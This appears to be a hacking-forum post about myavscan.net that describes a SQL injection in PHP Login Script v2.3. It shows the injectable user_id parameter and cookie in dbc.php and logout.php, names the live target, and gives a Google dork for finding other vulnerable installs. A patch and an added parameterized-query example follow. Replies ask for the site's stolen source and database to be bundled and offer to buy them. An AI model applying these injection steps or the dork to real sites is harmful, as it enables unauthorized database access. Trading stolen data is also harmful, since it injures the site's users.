myavscan.net source code with SQLDB
I write about this shit on my twitter, but rewrite also here.
Some scammerz sell this shit on some IT Sec/Hacking Resource.
Proof ::
How 2 hack ::
Vuln in dbc.php here :
Code:
http://myavscan.net/dbc.php?user_id=[SQLi]
logout.php file content:
Code:
if(isset($_SESSION['user_id']) || isset($_COOKIE['user_id'])) {
    // $_COOKIE[user_id] is client-controlled and goes into the query unescaped
    mysql_query("update `users` set `ckey`= '', `ctime`= '' where `id`='$_SESSION[user_id]' OR `id` = '$_COOKIE[user_id]'") or die(mysql_error());
}
need to set cookie here : dbc.php?user_id='[SQL] and go http://myavscan.net/logout.php....
Code:
<?php include 'dbc.php'; logout(); ?>
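if u have PHP Login Script v 2.3 on u'r CMS, u must patch file dbc.php with next code :
// google_dork: intext:"Powered by PHP Login Script"
Code:
// Escape the cookie value only when the cookie is present. mysql_real_escape_string()
// replaces the deprecated mysql_escape_string() and uses the open connection's charset.
$cookieUserID = isset($_COOKIE['user_id']) ? mysql_real_escape_string($_COOKIE['user_id']) : '';
// Test the cookie itself: isset() on the escaped copy would always be true.
if(isset($_SESSION['user_id']) || $cookieUserID !== '') {
    mysql_query("update `users` set `ckey`= '', `ctime`= '' where `id`='$_SESSION[user_id]' OR `id` = '$cookieUserID'") or die(mysql_error());
}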
©2011, copyright BLACK BURN
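For code bases that can move off the old mysql_* functions, the same logout update can be written with integer validation and bound parameters instead of string escaping. This is an added example, not code from the original post or from PHP Login Script; the function name `clear_login_keys`, the assumption that `id` is a positive integer, and the in-memory SQLite database standing in for MySQL are all illustrative.

```php
<?php
// Added example (not PHP Login Script's own code). Assumes the `users` table
// has the columns named on the page (id, ckey, ctime) and that `id` is a
// positive integer. SQLite in memory stands in for the real MySQL database.

function clear_login_keys(PDO $db, array $session, array $cookie): int
{
    $ids = [];
    foreach ([$session['user_id'] ?? null, $cookie['user_id'] ?? null] as $raw) {
        // Accept only plain positive integers; any other value is dropped.
        $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id !== false) {
            $ids[] = $id;
        }
    }
    $ids = array_values(array_unique($ids));
    if ($ids === []) {
        return 0; // nothing valid to act on, so no statement is executed
    }

    // One placeholder per id: values are bound, never concatenated into SQL.
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("UPDATE users SET ckey = '', ctime = '' WHERE id IN ($marks)");
    $stmt->execute($ids);
    return $stmt->rowCount(); // number of rows whose login key was cleared
}

// Constructed sample data for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, ckey TEXT, ctime TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'k1', 't1'), (2, 'k2', 't2')");

// Constructed malformed cookie value: it fails integer validation.
var_dump(clear_login_keys($db, [], ['user_id' => "1' OR '1'='1"]));

// Normal logout for the session user with id 2.
var_dump(clear_login_keys($db, ['user_id' => 2], []));

// Remaining login keys per user id after both calls.
var_dump($db->query("SELECT id, ckey FROM users")->fetchAll(PDO::FETCH_KEY_PAIR));
```

Unlike the original, this version also stops echoing raw database errors to the client, since PDO raises exceptions that can be logged server-side instead of passed to `die()`.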
It would be good if you put all of that in a RAR, it would be easier and you'd get more people, there you go.
Hey u wanna sell source and sql db to me email me with subject scan site source to balloontwisters@gmail.com just throw a price at me